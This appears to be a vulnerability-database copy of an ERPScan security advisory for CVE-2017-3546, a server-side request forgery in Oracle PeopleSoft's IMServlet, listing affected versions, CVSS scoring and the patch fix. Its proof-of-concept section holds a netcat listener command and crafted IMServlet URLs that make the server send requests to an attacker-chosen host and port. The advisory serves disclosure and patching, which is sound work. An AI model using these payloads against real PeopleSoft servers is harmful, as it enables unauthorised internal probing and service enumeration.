Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
erpscanERPScanERPSCAN-17-022
HistoryDec 23, 2016 - 12:00 a.m.

SSRF in PeopleSoft IMServlet

2016-12-2300:00:00
erpscan.io
625

0.008 Low

EPSS

Percentile

82.2%

JSON

Application: Oracle PeopleSoft **Versions Affected:**ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55; PeopleSoft HCM 9.2 Vendor:Oracle **Bugs:**SSRF **Reported:**23.12.2016 **Vendor response:**24.12.2016 **Date of Public Advisory:**18.04.2017 **Reference: **Oracle CPU April 2017 Authors: Roman Shalymov (ERPScan)

VULNERABILITY INFORMATION

Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
CVE: CVE-2017-3546

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An attacker can force a vulnerable server to trigger malicious requests to third-party servers and/or to internal resources. This vulnerability can then be leveraged to launch specific attacks such as cross-site port attack, service enumeration, and various other attacks.

VULNERABLE PACKAGES

ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017

TECHNICAL DESCRIPTION

Proof of Concept

1. nc -l -p # on some host

1

|

  1. nc -l -p # on some host

—|—

In browser

http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"

1

2

|

http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT

http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"

—|—

Response in netcat

GET /?param=var HTTP/1.1 User-Agent: Java1.7.0_95 Host: SOMEHOST:OPEN_PORT Accept: text/html, image/gif, image/jpeg, /; q=.2 Connection: Keep-Alive

1

2

3

4

5

|

GET /?param=var HTTP/1.1

User-Agent: Java1.7.0_95

Host: SOMEHOST:OPEN_PORT

Accept: text/html, image/gif, image/jpeg, /; q=.2

Connection: Keep-Alive

—|—

Related

packetstorm 1
zdt 2
exploitpack 1
prion 1
cvelist 1
nvd 1
cve 1
exploitdb 1
oracle 1
packetstorm
packetstorm
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF
2017-04-20 00:00:00
zdt
zdt
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF Vulnerabilities
2017-04-20 00:00:00
Oracle PeopleSoft - Server-Side Request Forgery Vulnerability
2017-05-20 00:00:00
exploitpack
exploitpack
Oracle PeopleSoft - Server-Side Request Forgery
2017-05-19 00:00:00
prion
prion
Code injection
2017-04-24 19:59:00
cvelist
cvelist
CVE-2017-3546
2017-04-24 19:00:00
nvd
nvd
CVE-2017-3546
2017-04-24 19:59:04
cve
cve
CVE-2017-3546
2017-04-24 19:59:04
exploitdb
exploitdb
Oracle PeopleSoft - Server-Side Request Forgery
2017-05-19 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2017
2017-04-18 00:00:00

0.008 Low

EPSS

Percentile

82.2%

JSON
Related for ERPSCAN-17-022
packetstorm1zdt2exploitpack1prion1cvelist1nvd1cve1exploitdb1oracle1